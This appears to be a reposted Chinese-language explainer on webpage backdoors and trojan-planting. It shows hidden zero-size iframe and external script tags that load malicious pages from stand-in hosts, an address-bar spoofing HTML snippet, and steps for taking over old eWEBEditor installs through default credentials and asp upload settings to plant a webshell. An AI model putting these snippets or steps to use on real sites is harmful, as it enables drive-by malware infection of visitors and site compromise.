网页后门的网页后门和网页挂马

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了网页后门的网页后门和网页挂马相关的知识,希望对你有一定的参考价值。

参考技术A

网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下: 以下是引用片段:
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> 解释:在打开插入该句代码的网页后,就也就打开了http://www.xxx.com/muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。下面我们做过做个演示,比如在某网页中插入如下代码: 以下是引用片段:
<iframe src=http://safe.it168.com width=200 height=200></iframe> js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。通常代码如下: 以下是引用片段:
<script language=javascript src=http://www.xxx.com/gm.js></script> 随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似: /Article/UploadFiles/200804/20080402113208921.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了,如图3。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如: 以下是引用片段:
<html>
<iframe src=http://www.xxx.com/test.htm height=0 width=0> </iframe>
<img src=/Article/UploadFiles/200804/20080402113212263.jpg></center>
</html> 高级欺骗,黑客利用IE或者Firefox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示一些用户信任的地址,其实却打开了被挂马的页面,从而实现欺骗,示例代码如: 以下是引用片段:
<p><a id=qipian href=http://www.hacker.com.cn></a></p>
<div>
<a href=http://safe.it168.com target=_blank>
<table>
<caption>
<label for=qipian>
<u style=cursor;pointer;color;blue>
</u>
</label>
</caption>
</table>
</a>
</div> eWEBEditor是一个在线的HTML编辑器,很多网站都集成这个编辑器,以方便发布信息。低版本的eWEBEditor在线HTML编辑器,存在者上传漏洞,黑客利用这点得到WEBSHELL(网页管理权限)后,修改了网站,进行了挂马操作。
其原理是:eWEBEditor的默认管理员登录页面没有更改,而且默认的用户名和密码都没有更改。攻击者登陆eWEBEditor后,添加一种新的样式类型,然后设置上传文件的类型,比如加入asp文件类型,就可以上传一个网页木马了。 (1)攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似ewebeditor.asp?id=语句,只要类似的语句存在,就能判断网站确实使用了WEB编辑器。
(2)eWEBEditor编辑器可能被黑客利用的安全漏洞:
a.管理员未对数据库的路径和名称进行修改,导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。
b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆或者直接输入默认的用户名和密码,直接进入编辑器的后台。
c.该WEB编辑器上传程序存在安全漏洞。

以上是关于网页后门的网页后门和网页挂马的主要内容,如果未能解决你的问题,请参考以下文章

我的网页总是被挂马怎么防止?

XSS漏洞,通过XSS实现网页挂马

揭秘几种最主要的挂马技术

怎么在js中挂马

[安全设置] 防范网页挂马攻击 从对WEB站点进行安全评估开始红盟安全

[安全设置] 防范网页挂马攻击 从对WEB站点进行安全评估开始红盟安全